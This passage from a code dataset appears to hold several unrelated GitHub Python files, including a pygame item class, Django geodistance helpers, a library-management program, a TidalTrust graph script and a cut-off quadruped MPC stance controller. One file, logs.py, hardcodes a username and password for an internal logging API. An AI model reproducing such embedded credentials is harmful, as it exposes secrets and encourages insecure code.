\"x_milstein(t_i)\"\n ]\n)\npath_line_plot = sns.lineplot(\n data=df,\n x=\"t_i\",\n y=\"x_milstein(t_i)\"\n)\npath_line_plot.axhline(\n y=1.0,\n color='r',\n ls='--',\n label='Carrying 
capacity'\n)\nplt.show()\n","repo_name":"SaulDiazInfante/EM-infererence-gen-log-sde","sub_path":"visualization/realization_path.py","file_name":"realization_path.py","file_ext":"py","file_size_in_byte":424,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"32023001033","text":"from pico2d import *\nimport logo_state\nimport random\nimport game_framework\nimport game_world\nfrom player import Player\n\nclass Item:\n SPEED = 200\n BOTTOM = 150\n ANIMATION_TOP = 200\n def __init__(self, level):\n self.image = logo_state.item_box\n self.x, self.y = 0, 575\n self.speed = 1 + random.random()\n self.setting = False\n self.item_kind = random.randint(0, level + 1)\n while logo_state.key_check == 2 and self.item_kind == 0:\n self.item_kind = random.randint(0, level + 1)\n while (logo_state.is_not_protect == 2 or logo_state.is_not_protect == 3)and self.item_kind == 3:\n self.item_kind = random.randint(0, level + 1)\n self.progress_image = logo_state.progress_bar\n self.progress_index = 9\n self.press_time = 0.0\n self.level = level\n self.animation_index = 0\n self.life_get = False\n self.key_get = False\n self.is_press = False\n self.power_frame = 0\n self.time = 0\n self.size = 75\n print(self.item_kind)\n\n def item_down_animation(self):\n if self.y > Item.BOTTOM:\n self.y += -1 * game_framework.frame_time * self.speed * Item.SPEED\n if self.y <= Item.BOTTOM:\n self.y = Item.BOTTOM\n self.setting = True\n\n def item_get_animation(self):\n if self.y < Item.ANIMATION_TOP:\n self.y += game_framework.frame_time * self.speed * Item.SPEED\n if self.y >= Item.ANIMATION_TOP:\n if self.item_kind == 0:\n self.x, self.y = 100, 40\n self.key_get = True\n elif self.item_kind == 1:\n self.life_get = True\n self.animation_index += 1\n\n def item_goto_sky(self):\n if self.y < 575:\n self.y += game_framework.frame_time * self.speed * Item.SPEED\n if self.y >= 575:\n game_world.remove_object(self)\n\n def item_power_up_animation(self):\n self.time += game_framework.frame_time\n self.power_frame = round(self.time) % 5\n if self.time > 1 and self.power_frame == 0:\n logo_state.is_not_protect = 1\n logo_state.power_sound.set_volume(32)\n logo_state.power_sound.play()\n game_world.remove_object(self)\n\n def update(self):\n if self.animation_index == 0: Item.item_down_animation(self)\n elif self.animation_index == 1: Item.item_get_animation(self)\n elif self.animation_index == 2 and self.item_kind == 3:\n self.x, self.y = 170, 40\n Item.item_power_up_animation(self)\n elif self.animation_index == 2 and (self.item_kind != 0 and self.item_kind != 1): Item.item_goto_sky(self)\n\n if self.setting:\n self.progress_index = round(self.press_time * 20)\n if self.progress_index > 9:\n logo_state.effect_sound.set_volume(32)\n logo_state.effect_sound.play()\n if self.item_kind == 0: self.image = logo_state.key_image\n elif self.item_kind == 1:\n if self.level == 1: self.image = logo_state.red\n elif self.level == 2: self.image = logo_state.pink\n elif self.level == 3: self.image = logo_state.black\n elif self.level == 4: self.image = logo_state.yellow\n elif self.level == 5: self.image = logo_state.blue\n elif self.item_kind == 3:\n self.image = logo_state.power_up\n self.size = 50\n logo_state.is_not_protect = 2\n else:\n self.image = logo_state.npc_image1\n\n self.animation_index += 1\n self.setting = False\n\n if self.is_press:\n self.press_time += game_framework.frame_time\n\n def draw(self):\n self.image.clip_draw(self.power_frame * self.size, 0, self.size, 
self.size, self.x, self.y)\n #else:\n #self.image.draw(self.x, self.y)\n if self.setting:\n self.progress_image.clip_draw(0, self.progress_index * 50, 100, 50, self.x, self.y + 50)\n\n def draw_bb(self):\n draw_rectangle(*self.get_bb())\n\n def get_bb(self):\n return self.x - 35, self.y - 35, self.x + 35, self.y + 35\n\n def collide(self, a, b, state, num):\n left_a, bottom_a, right_a, top_a = a.get_bb(state, num)\n left_b, bottom_b, right_b, top_b = b.get_bb()\n\n if state == 2 or state == 3: return False\n if left_a > right_b: return False\n if right_a < left_b: return False\n if top_a < bottom_b: return False\n if bottom_a > top_b: return False\n return True","repo_name":"mwon0326/2D-GamePrograming","sub_path":"term/item.py","file_name":"item.py","file_ext":"py","file_size_in_byte":4749,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"25865722927","text":"a=input()\nf=0\nl=len(a)-1\nwhile f<=l:\n for i in range(len(a)):\n if i==f or i==l:\n print(a[i],end=\"\")\n else:\n print(\" \",end=\"\")\n print(\"\\r\")\n f=f+1\n l=l-1\nn=int(len(a)/2)\nf1=n-1\nf2=n+1\nwhile f1>=0 and f2<=len(a):\n for i in range(len(a)):\n if i==f1 or i==f2:\n print(a[i],end=\"\")\n else:\n print(\" \",end=\"\")\n print(\"\\r\")\n f1=f1-1\n f2=f2+1","repo_name":"chandu11feb/Coding_problems","sub_path":"Odd Length String Diagonal Pattern.py","file_name":"Odd Length String Diagonal Pattern.py","file_ext":"py","file_size_in_byte":428,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"15918409500","text":"import json\nfrom pathlib import Path\nfrom typing import Union\n\n\ndef flatten_message(message: Union[str, dict, list]) -> str:\n if isinstance(message, str):\n return message\n elif isinstance(message, dict):\n if message['type'] == 'link':\n return ''\n return flatten_message(message['text'])\n elif isinstance(message, list):\n return ' '.join(flatten_message(m) for m in message)\n else:\n raise ValueError(f'message should be str, list or dict. 
Got {type(message)}')\n\n\ndef read_messages(path: Union[Path, str, bytes]) -> list[str]:\n with open(path) as f:\n data = json.load(f)\n result = []\n for message in (m for m in data['messages'] if m['type'] == 'message'):\n text = flatten_message(message)\n if text:\n result.append(text)\n return result\n","repo_name":"The0nix/chat_wordcloud","sub_path":"chat.py","file_name":"chat.py","file_ext":"py","file_size_in_byte":836,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"26553168599","text":"import json\nfrom datetime import date\nfrom enum import Enum\n\nimport requests\n\nfrom src.lib.util import Server\nfrom src.lib.util_config import get_ip\n\n\nclass Area(Enum):\n SMT_IN = \"SMT_IN\"\n SMT_OUT = \"SMT_OUT\"\n PACKING = \"PACKING\"\n\n\nclass Type(Enum):\n INFO_SUMMARY_HOUR = 'INFO_SUMMARY_HOUR'\n MISS_TARGET = 'MISS_TARGET'\n\n\ndef get_credentials():\n return {\n 'user': 'iradi_admin',\n 'password': 'root2000'\n }\n\n\ndef logs_dir():\n return f'http://{get_ip(Server.ONLINE)}:3040/api/collections/logs/records'\n\n\ndef get_token():\n try:\n url = f'http://{get_ip(Server.ONLINE)}:3040/api/collections/users/auth-with-password'\n token = requests.post(\n url=url,\n data={\"identity\": get_credentials()['user'], \"password\": get_credentials()['password']}\n )\n\n if token.status_code == 200:\n return token.json()['token']\n\n except requests.exceptions.HTTPError as errh:\n print(\"Http Error:\", errh)\n except requests.exceptions.ConnectionError as errc:\n print(\"Error Connecting:\", errc)\n except requests.exceptions.Timeout as errt:\n print(\"Timeout Error:\", errt)\n except requests.exceptions.RequestException as err:\n print(\"OOps: Something Else\", err)\n return ''\n\n\ndef get_current_day_lost_target_logs():\n current_day = date.today().strftime(\"%Y-%m-%d\")\n try:\n logs = requests.get(\n url=logs_dir() + f'?perPage=500&filter=(date = \"{current_day}\" %26%26 type = \"MISS_TARGET\")',\n headers={\n 'Content-Type': 'application/json',\n 'Authorization': get_token()\n }\n )\n\n if logs.status_code == 200:\n return logs.json()['items']\n pass\n\n except requests.exceptions.HTTPError as errh:\n print(\"Http Error:\", errh)\n except requests.exceptions.ConnectionError as errc:\n print(\"Error Connecting:\", errc)\n except requests.exceptions.Timeout as errt:\n print(\"Timeout Error:\", errt)\n except requests.exceptions.RequestException as err:\n print(\"OOps: Something Else\", err)\n\n\ndef post_target_loss_log(area: Area, index, line, uph, target):\n current_day = date.today().strftime(\"%Y-%m-%d\")\n try:\n logs = requests.post(\n url=logs_dir(),\n headers={\n 'Content-Type': 'application/json',\n 'Authorization': get_token()\n },\n data=json.dumps({\n \"date\": current_day,\n \"hour\": \"00:00:00\",\n \"index\": index,\n \"line\": line,\n \"area\": area.value,\n \"type\": Type.MISS_TARGET.value,\n \"payload\": {\n \"status\": 'open',\n \"issues_id\": [],\n \"fix_val\": [\n index,\n uph,\n target\n ]\n }\n })\n )\n\n print(logs.status_code)\n return logs.status_code\n\n except requests.exceptions.HTTPError as errh:\n print(\"Http Error:\", errh)\n except requests.exceptions.ConnectionError as errc:\n print(\"Error Connecting:\", errc)\n except requests.exceptions.Timeout as errt:\n print(\"Timeout Error:\", errt)\n except requests.exceptions.RequestException as err:\n print(\"OOps: Something Else\", 
err)\n","repo_name":"SkyLicht/ie_tool_server","sub_path":"src/http/logs.py","file_name":"logs.py","file_ext":"py","file_size_in_byte":3420,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"40780489834","text":"from .models import Delivery, Outlet\nfrom django.http.response import JsonResponse\nfrom django.contrib.gis.measure import D\nfrom django.contrib.gis.db.models.functions import Distance\n\ndef check_if_delivery(point):\n try:\n deliveries = Delivery.objects.filter(polygon_area__contains = point)\n if deliveries:\n return deliveries[0].delivery_id\n else:\n return False\n except Exception as e:\n return JsonResponse({'error' : str(e)}, status = 400)\n\n\ndef check_nearby_outlet(point):\n try:\n outlets = Outlet.objects.filter(location__distance_lte=(point, 0.09009)).annotate(distance=Distance('location', point)).order_by('distance')\n if outlets:\n data = []\n for i in outlets:\n outlet_details = {\n \"outlet_id\": i.outlet_id,\n \"outlet_name\": i.name,\n \"location\": str(i.lat) + str(i.long),\n \"distance\": i.distance*111.0\n }\n data.append(outlet_details)\n return JsonResponse(data, safe=False, status=200)\n else:\n return JsonResponse({'error': 'No outlets within 10 km distance detected'}, status=400)\n except Exception as e:\n return JsonResponse({'error': str(e)}, status=400)\n","repo_name":"Candi2733/Django","sub_path":"geocoding/map/functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":1316,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"22621257436","text":"import datetime \r\nimport os\r\nos.getcwd()\r\n \r\nclass LMS:\r\n def __init__(self, list_of_books, library_name):\r\n self.list_of_books = \"list_of_books.txt\"\r\n self.library_name = library_name\r\n self.books_dict = {}\r\n id = 101\r\n with open(self.list_of_books) as b:\r\n content = b.readlines()\r\n for line in content:\r\n self.books_dict.update({str(id):{\"books_title\":line.replace(\"\\n\",\"\"),\"lender_name\": \"\",\"Issue_date\":\"\",\"Status\":\"Ada\"}})\r\n id = id + 1\r\n\r\n def display_books(self):\r\n print(\"--------------------Daftar Buku--------------------\")\r\n print(\"ID Buku\", \"\\t\",\"Judul\")\r\n print(\"---------------------------------------------------\")\r\n for key, value in self.books_dict.items():\r\n print(key,\"\\t\\t\",value.get(\"books_title\"), \"- [\",value.get(\"Status\"),\"]\")\r\n\r\n def Issue_books(self):\r\n books_id = input(\"Masukkan ID buku: \")\r\n current_date = datetime.datetime.now().strftime(\"%Y-%m_%d %H:%M:%S\")\r\n if books_id in self.books_dict.keys():\r\n if not self.books_dict[books_id][\"Status\"] == \"Ada\":\r\n print(f\"Buku ini telah dipinjam oleh {self.books_dict[books_id]['lender_name']} \\ di tanggal {self.books_dict[books_id]['Issue_date']}\")\r\n return self.Issue_books()\r\n elif self.books_dict[books_id]['Status'] == \"Ada\":\r\n your_name = input(\"Masukkan nama anda: \")\r\n self.books_dict[books_id]['lender_name'] = your_name\r\n self.books_dict[books_id]['Issue_date'] = current_date\r\n self.books_dict[books_id]['Status'] = \"Sudah Dipinjamkan\"\r\n print(\"Buku berhasil dipinjamkan!!! \\n\")\r\n else:\r\n print(\"ID buku tidak ditemukan\")\r\n return self.Issue_books()\r\n\r\n def add_books(self):\r\n new_books = input(\"Masukkan judul buku: \")\r\n if new_books == \"\":\r\n return self.add_books()\r\n elif len(new_books) > 25:\r\n print(\"Judul buku terlalu panjang! 
batas jumlah huruf untuk judul adalah 25\")\r\n return self.add_books()\r\n else:\r\n with open(self.list_of_books,\"a\") as b:\r\n b.writelines(f\"{new_books}\\n\")\r\n self.books_dict.update({str(int(max(self.books_dict))+1):{'books_title':new_books,'lender_name':'','lend_date':'', 'status':'Ada'}})\r\n print(f\"Buku '{new_books}' telah berhasil ditambahkan!\")\r\n\r\n def return_books(self):\r\n books_id = input(\"Masukkan ID buku: \")\r\n if books_id in self.books_dict.keys():\r\n if self.books_dict[books_id][\"Status\"] == \"Ada\":\r\n print(\"Buku ini belum dipinjamkan dan masih di perpustakaan ZETA. Mohon periksa ulang ID buku\")\r\n return self.return_books()\r\n elif not self.books_dict[books_id][\"Status\"] == \"Ada\":\r\n self.books_dict[books_id][\"lender_name\"] = \"\"\r\n self.books_dict[books_id][\"Issue_date\"] = \"\"\r\n self.books_dict[books_id][\"Status\"] = \"Ada\"\r\n print(\"Buku berhasil dikembalikan!\")\r\n else:\r\n print(\"ID buku tidak ditemukan, mohon periksa kembali\")\r\n\r\nif __name__ == \"__main__\":\r\n try:\r\n mylms = LMS(\"list_of_books.txt\", \"ZETA\")\r\n press_key_list = {\"D\": \"Daftar Buku\", \"M\": \"Minjam Buku\", \"N\": \"Nambah Buku\", \"O\": \"Mengembalikan Buku\", \"Q\": \"Quit\"} \r\n \r\n key_press = False\r\n while not (key_press == \"q\"):\r\n print(f\"\\n----------Selamat datang ke Sistem Manajemen Perpustakaan {mylms.library_name}---------\\n\")\r\n for key, value in press_key_list.items():\r\n print(\"Press\", key, \"To\", value)\r\n key_press = input(\"Press Key : \").lower()\r\n if key_press == \"m\":\r\n print(\"\\nMenu Pilihan : Minjam Buku\\n\")\r\n mylms.Issue_books()\r\n \r\n elif key_press == \"n\":\r\n print(\"\\nMenu Pilihan : Nambah Buku\\n\")\r\n mylms.add_books()\r\n\r\n elif key_press == \"d\":\r\n print(\"\\nMenu Pilihan : Daftar Buku\\n\")\r\n mylms.display_books()\r\n \r\n elif key_press == \"o\":\r\n print(\"\\nMenu Pilihan : Mengembalikan Buku\\n\")\r\n mylms.return_books()\r\n elif key_press == \"q\":\r\n break\r\n else:\r\n continue\r\n except Exception as e:\r\n print(\"Sistem Error, Mohon Periksa Ulang!!!!\")\r\n","repo_name":"aditiapawaid/LearnPy","sub_path":"Python LMS.py","file_name":"Python LMS.py","file_ext":"py","file_size_in_byte":4547,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"72288679171","text":"import pkg_resources\n\n__cached = None\n\ndef get_environment():\n global __cached\n if __cached is None:\n __cached = [\n {\"name\": str(pkg.project_name), \"path\": str(pkg.location), \"version\": str(pkg.parsed_version) } for pkg in pkg_resources.working_set\n ]\n return __cached","repo_name":"d-krupke/AeMeasure","sub_path":"aemeasure/utils/env.py","file_name":"env.py","file_ext":"py","file_size_in_byte":294,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"43"} +{"seq_id":"34572870859","text":"import sys\n\nTAG = \"\"\n\ncontent_filename = sys.argv[1]\nhtml_filename = sys.argv[2]\n\nwith open(content_filename, 'r') as content_file:\n content = content_file.read()\n \n with open(html_filename, 'r') as html_file:\n result = html_file.read().replace(TAG, content, 1)\n print(result)","repo_name":"gutoboranga/poa-accidents-map","sub_path":"leaflet/html_filler.py","file_name":"html_filler.py","file_ext":"py","file_size_in_byte":315,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"11266875035","text":"# LeetCode 39\n\n'''\nGiven an array of 
distinct integers candidates and a target integer target, return a list of all unique combinations of candidates where the chosen numbers sum to target. You may return the combinations in any order.\n\nThe same number may be chosen from candidates an unlimited number of times. Two combinations are unique if the frequency of at least one of the chosen numbers is different.\n\nIt is guaranteed that the number of unique combinations that sum up to target is less than 150 combinations for the given input.\n\n\nExample 1:\nInput: candidates = [2,3,6,7], target = 7\nOutput: [[2,2,3],[7]]\n\nExplanation:\n2 and 3 are candidates, and 2 + 2 + 3 = 7. Note that 2 can be used multiple times.\n7 is a candidate, and 7 = 7.\nThese are the only two combinations.\n'''\n\ndef combinationSum(self, candidates: List[int], target: int) -> List[List[int]]:\n ans=[]\n \n '''\n Backtracking\n i -> pointer for candidates\n arr -> temp array for making combinations\n total -> sum of temp combinations\n ans -> final array of all satisfying combination\n '''\n \n def dfs(i,arr,total):\n # combination of candidates where sum = target\n if total==target:\n ans.append(arr.copy())\n return\n \n # all candidates used or \n # total > target ,i.e we can't get any combinations using ith candidate further.\n if i>=len(candidates) or total>target:\n return\n \n ''' left branch will contain all combinations with ith candidate and right branch will contain combinations excluding ith candidate '''\n \n # (left branch) adding next candidate to arr.\n arr.append(candidates[i])\n dfs(i, arr, total+candidates[i])\n \n # (right branch) removing ith element that was previously used.\n arr.pop()\n dfs(i+1, arr, total)\n \n dfs(0,[],0)\n \n return ans\n","repo_name":"vedant115/LeetCode","sub_path":"Daily LeetCode Challenge/February/Combination_Sum.py","file_name":"Combination_Sum.py","file_ext":"py","file_size_in_byte":1912,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"26879860997","text":"import networkx as nx\nimport matplotlib.pyplot as plt\nfrom itertools import compress\nimport numpy as np\n\ngraph = [(1, 2),(1, 3),(1, 4),(2, 5),(2, 6),(3, 5),(3, 6),(4, 6),(5, 7),(6, 7)]#,(6, 8)]\n#node_max should have an element for each unique node in the graph\n#node_max = [0,9,8,10,9,9,0]#,0]\nnode_max = []\n#ratings should be of length len(graph)\nratings = [9,8,10,9,8,10,10,9,8,6]#,0]\nq = []\ncolor = [0]*len(graph)\n\ndef get_graph(graph):\n\n # extract nodes from graph\n nodes = set([n1 for n1, n2 in graph] + [n2 for n1, n2 in graph])\n # node_max = [0]* len(nodes)\n # create networkx graph\n # G=nx.Graph()\n G = nx.DiGraph()\n\n # add nodes\n for node in nodes:\n \t# G.add_node(node, max=node_max[node-1])\n \tG.add_node(node, max=0)\n\n # add edges\n for edge in graph:\n G.add_edge(edge[0], edge[1], rating=ratings[graph.index(edge)])\n # print(\"index ed\", graph.index(edge))\n\n # draw graph\n # pos = nx.shell_layout(G)\n # nx.draw(G, pos)\n\n # show graph\n # plt.show()\n return G\n\ndef draw_graph(G, graph, labels=None, graph_layout='shell',\n node_size=1600, node_color='blue', node_alpha=0.3,\n node_text_size=12,\n edge_color='blue', edge_alpha=0.3, edge_tickness=1,\n edge_text_pos=0.3,\n text_font='sans-serif'):\n\n \n # these are different layouts for the network you may try\n # shell seems to work best\n if graph_layout == 'spring':\n graph_pos=nx.spring_layout(G)\n elif graph_layout == 'spectral':\n graph_pos=nx.spectral_layout(G)\n elif graph_layout == 'random':\n 
graph_pos=nx.random_layout(G)\n else:\n graph_pos=nx.shell_layout(G)\n\n \n nx.draw_networkx_nodes(G,graph_pos,node_size=node_size, \n alpha=node_alpha, node_color=node_color)\n nx.draw_networkx_edges(G,graph_pos,width=edge_tickness,\n alpha=edge_alpha,edge_color=edge_color)\n node_labels = nx.get_node_attributes(G,'max')\n nx.draw_networkx_labels(G, graph_pos,labels = node_labels,font_size=node_text_size,\n font_family=text_font)\n\n # if labels is None:\n # labels = range(len(graph))\n\n edge_labels = nx.get_edge_attributes(G,'rating')\n nx.draw_networkx_edge_labels(G, graph_pos, edge_labels=edge_labels, \n label_pos=edge_text_pos)\n\n # show graph\n plt.show()\n\n# def path_flow(scores,node):\n# \t#get edges list\n# \t#from find edges ending with node\n# \t#return min\n\n# \tpass\n\ndef tidal_trust(source, sink):\n\tglobal q\n\tglobal node_max\n\td = [];\n\tq.append(source)\n\td.append(source)\n\tdepth = 1\n\tmax_depth = 1000\n\tfound = False\n\ttemp_q = []\n\tscores = nx.get_edge_attributes(g, 'rating')\n\n\tcache_rating = []\n\n\n\twhile (len(q) != 0 & depth <= max_depth):\n\t\tnl = q.pop()\n\t\tprint(\"current top node\", nl)\n\t\t\n\t\tfor n in g.neighbors(nl):\n\t\t\t# if depth > 1:\n\t\t\t# \tprint(\"my[\",n,\"]parent(s): \", d[depth-1])\n\t\t\t# else:\n\t\t\t\t# print(\"my[\",n,\"]parent(s): \", nl)\n\t\t\t\n\t\t\tprint(\"my[\",n,\"] fake parent(s) : \", d[depth-1])\n\t\t\t\n\t\t\tko = [e[1]== n for e in g.edges]\n\t\t\ttemp_l = list(compress(g.edges(), ko))\n\t\t\t# print(\"temp_l\", temp_l)\n\t\t\tmax_list = []\n\t\t\tpp_list = []\n\t\t\t[pp_list.append(l[0]) for l in temp_l]\n\t\t\tprint(\"pp list\",pp_list)\n\t\t\tatts = nx.get_node_attributes(g,'max')\n\t\t\t\n\t\t\t[max_list.append(atts[l[0]]) for l in list(compress(g.edges(), ko))]\n\n\t\t\tprint(\"real parents maxes\", max_list)\n\t\t\tr = scores[(nl,n)]\n\t\t\tif depth == 1:\n\t\t\t\tg.node[n]['max'] = r\n\t\t\telse:\n\t\t\t\tg.node[n]['max'] = max(max_list)\n\t\t\t\tprint('max_node',pp_list[np.argmax(max_list)])\n\t\t\t\tprint('max_node scored me', scores[(pp_list[np.argmax(max_list)],n)] )\n\t\t\t\tg.node[n]['max'] = min(max(max_list),scores[(pp_list[np.argmax(max_list)],n)]) \n\n\t\t\tif n == sink:\n\t\t\t\tcache_rating.append(scores[(nl,n)])\n\t\t\t\tfound = True\n\t\t\t\tprint(\"found\")\n\t\t\t\t# print(\"cache_rating\", cache_rating)\n\t\t\t\tmax_depth = depth\n\t\t\t\t# print(\"found depth\", depth)\n\t\t\t\t# print(\"previous level\", d[depth-2])\n\t\t\t\t# get the max node leading to n\n\t\t\t\t#the\n\t\t\t\tflow = min(cache_rating)\n\t\t\t\t# print(\"min=\",flow)\n\t\t\t\t# d.append([n])\n\t\t\t\t# children.append(sink)\n\t\t\t\ttemp_q.append(n)\n\t\t\t\t\n\t\t\telse:\n\t\t\t\tif color[n] == 0:\n\t\t\t\t\tcolor[n] = 1\n\t\t\t\t\ttemp_q.append(n)\n\t\t\t\t\t#get the max node leading to n\n\t\t\t\t\t#the\n\t\t\t\t# print(\">>>>>>>>>\")\n\n\t\t# print(\"cache_rating\", cache_rating)\n\t\tif not q:\n\t\t\td.append(temp_q[:])\n\t\t\tif(not found):\n\t\t\t\tq = temp_q\n\t\t\t\t# d.append(temp_q[:])\n\t\t\t\t# print(d)\n\t\t\t\tdepth = depth + 1\n\t\t\t\ttemp_q = []\n\n\tprint(\"d\",d)\n\t# print(\"depth\",depth)\n\tuuu = nx.get_node_attributes(g,'max')\n\tnode_max = uuu\n\t# print(\"maxes\", node_max)\n\twhile not d:\n\t\tprint(d.pop())\n\ng = get_graph(graph)\ndraw_graph(g, graph)\ntidal_trust(1,7)\ndraw_graph(g, 
graph)\n\n","repo_name":"xahiru/tidal_trust","sub_path":"tidal_trust.py","file_name":"tidal_trust.py","file_ext":"py","file_size_in_byte":4734,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"43"} +{"seq_id":"39233328260","text":"\"\"\"\n% 2023\n% Alexander Schperberg\n% aschperberg28@g.ucla.edu\n% 06/20/23\n\"\"\"\nimport pdb\n\n# This file provides a stance leg controller (through force MPC), modeled after the paper: 'Dynamic Locomotion in\n# the MIT Cheetah 3 Through Convex Model Predictive Control' by Jared Dicarlo, Patrick M. Wensing, Benjamin Katz,\n# Gerardo Bledt, and Sangbae Kim'\nfrom casadi import *\nimport numpy as np\n\nclass StanceController():\n def __init__(self, N, Q, R, P, dt):\n # length of the prediction horizon\n self.N = N\n # state weighing matrix\n self.Q = Q\n # control weighing matrix\n self.R = R\n # terminal weighing matrix\n self.P = P\n # discretized time\n self.dt = dt\n # gravity term\n self.g = vertcat(0, 0, 0, 0,0,0,0,0,0,0,0,-9.81)\n # robot mass\n self.m = 8.8\n # set the rotational inertia matrix of the robot in the body frame\n Px = 55303643.08 / (10 ** 9)\n Py = 60119440.34 / (10 ** 9)\n Pz = 105304340.05 / (10 ** 9)\n self.I = np.array([[Px, 0, 0], [0, Py, 0], [0, 0, Pz]])\n # zero matrix\n self.zero_mat = np.array([[0,0,0],[0,0,0],[0,0,0]])\n # identity matrix\n self.identity = np.array([[1,0,0],[0,1,0],[0,0,1]])\n # identity over mass matrix\n self.identity_m = np.array([[1 / self.m, 0, 0], [0, 1 / self.m, 0], [0, 0, 1 / self.m]])\n # initialize variables\n self.initialize_variables()\n\n def initialize_variables(self):\n # initialize the opti stack helper class, using the 'conic' keyword as we will use qpOases\n self.opti = casadi.Opti('conic')\n # initialize the robot states: heading angle (th), center of mass base position (r), angular velocity (dth),\n # linear velocity (dr)\n # initialize the robot controls: ground reaction forces per foot\n self.f1 = self.opti.variable(3, self.N)\n self.f2 = self.opti.variable(3, self.N)\n self.f3 = self.opti.variable(3, self.N)\n self.f4 = self.opti.variable(3, self.N)\n self.controls = vertcat(self.f1, self.f2, self.f3, self.f4)\n # provide a parameter for the reference states (reference must include current value)\n self.body_mpc = self.opti.parameter(12, self.N+1)\n # provide a parameter for the reference footstep positions in the base frame (references must include current value)\n self.p_mpc = self.opti.parameter(12, self.N+1)\n # provide a parameter for the contact matrix (0 means foot is in swing, and 1 means foot is in stance)\n self.contact_mpc = self.opti.parameter(4,self.N)\n # since dt may change, we make it a parameter\n self.dt_param = self.opti.parameter(1, 1)\n self.opti.set_value(self.dt_param,self.dt)\n # set up the MPC problem\n self.objective_function()\n self.control_constraints()\n self.initialize_solver()\n\n def objective_function(self):\n # calculates the summation of cost from the paper\n self.cost = 0\n state = self.body_mpc[:,0]\n for i in range(self.N):\n # get the orientation angles needed for the rotation matrix from the reference trajectory\n thx = self.body_mpc[0, i]\n thy = self.body_mpc[1, i]\n thz = self.body_mpc[2, i]\n # calculate the unique A matrix using the current orientation\n self.A = self.dyanmic_matrix_A(thx, thy, thz)\n\n # retrieve the reference footstep positions\n r, p1, p2, p3, p4 = self.body_mpc[3:6, i], self.p_mpc[0:3, i], self.p_mpc[3:6, i], self.p_mpc[6:9,\n i], self.p_mpc[9:12, i]\n\n # calculate the unique B 
matrix using the current reference orientation and footstep positions\n self.B = self.dynamic_matrix_B(thx, thy, thz, p1, p2, p3, p4)\n\n control_t = self.controls[:, i]\n # calculate the next state, using the time-invarient linearly discretized equation\n I = np.eye(12, 12)\n\n state = mtimes(I + self.A * self.dt_param, state) + mtimes(self.B * self.dt_param, control_t) + self.dt_param * self.g\n\n state_ref = self.body_mpc[:, i+1]\n control = self.controls[:, i]\n\n if i == self.N-1:\n self.cost = self.cost + mtimes(mtimes((state - state_ref).T, self.P), state - state_ref)\\\n + \\\n mtimes(mtimes((control).T, self.R), control)\n else:\n self.cost = self.cost + mtimes(mtimes((state - state_ref).T, self.Q), state - state_ref) \\\n + \\\n mtimes(mtimes((control).T, self.R), control)\n\n def control_constraints(self):\n # we must ensure that the force is zero when the leg is in swing. To do this, we calculate the force selection\n # matrix using the reference contact matrix\n for k in range(self.N):\n # create the stance/swing selection matrix\n # if foot is in swing phase, we want to make sure that the forces will be equal to zero at all times. A zero\n # means foot is currently in swing and not in contact with the ground\n D1 = if_else(self.contact_mpc[0, k] == 0, self.identity, self.zero_mat)\n D2 = if_else(self.contact_mpc[1, k] == 0, self.identity, self.zero_mat)\n D3 = if_else(self.contact_mpc[2, k] == 0, self.identity, self.zero_mat)\n D4 = if_else(self.contact_mpc[3, k] == 0, self.identity, self.zero_mat)\n D = vertcat(horzcat(D1, self.zero_mat, self.zero_mat, self.zero_mat),\n horzcat(self.zero_mat, D2, self.zero_mat, self.zero_mat),\n horzcat(self.zero_mat, self.zero_mat, D3, self.zero_mat),\n horzcat(self.zero_mat, self.zero_mat, self.zero_mat, D4))\n # we now set forces to zero for the feet not on the ground\n self.opti.subject_to(mtimes(D, self.controls[:, k]) == 0)\n\n # for the feet on the ground, we must impose friction cone constraints. 
A one indicates food is making contact\n F1 = if_else(self.contact_mpc[0, k] == 1, self.identity, self.zero_mat)\n F2 = if_else(self.contact_mpc[1, k] == 1, self.identity, self.zero_mat)\n F3 = if_else(self.contact_mpc[2, k] == 1, self.identity, self.zero_mat)\n F4 = if_else(self.contact_mpc[3, k] == 1, self.identity, self.zero_mat)\n f1 = mtimes(F1, self.controls[0:3, k])\n f2 = mtimes(F2, self.controls[3:6, k])\n f3 = mtimes(F3, self.controls[6:9, k])\n f4 = mtimes(F4, self.controls[9:12, k])\n\n # we now make the friction cone constraints (note, that if force of the foot is zero, as done using the\n # if_else statement above for feet in swing, the contact constraints are automatically satisfied for that\n # foot)\n self.contact_constraints(f1)\n self.contact_constraints(f2)\n self.contact_constraints(f3)\n self.contact_constraints(f4)\n\n def contact_constraints(self, f):\n # input of the function is the reaction force of the leg\n fx = f[0]\n fy = f[1]\n fz = f[2]\n self.opti.subject_to(self.opti.bounded(-0,fz,150))\n # coefficient of friction\n mu = 0.6\n # friction cone constraints\n self.opti.subject_to(self.opti.bounded(-mu * fz, fx, mu * fz))\n self.opti.subject_to(self.opti.bounded(-mu * fz, -fx, mu * fz))\n self.opti.subject_to(self.opti.bounded(-mu * fz, fy, mu * fz))\n self.opti.subject_to(self.opti.bounded(-mu * fz, -fy, mu * fz))\n\n\n def rotation_matrix_inv(self, thx, thy, thz):\n # thz is yaw, thy is pitch, and thx is roll\n # we assume non-zero values for roll, pitch, and yaw\n # we assume non-zero roll, pitch, and yaw\n # body to world\n R = vertcat(horzcat(cos(thz) / cos(thy), sin(thz) / cos(thy), 0),\n horzcat(-sin(thz), cos(thz), 0),\n horzcat(cos(thz) * tan(thy), sin(thz) * tan(thy), 1))\n\n return R\n\n def rotation_matrix_body_world(self, thx, thy, thz):\n th = [thx,thy,thz]\n # rotation matrix of body to 